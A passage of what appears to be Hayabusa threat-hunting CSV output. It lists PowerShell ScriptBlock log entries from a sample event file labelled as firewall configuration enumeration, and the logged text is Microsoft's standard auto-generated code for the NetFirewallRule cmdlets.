-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 
'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', 
$__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Copy-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(Pa",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"rameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and 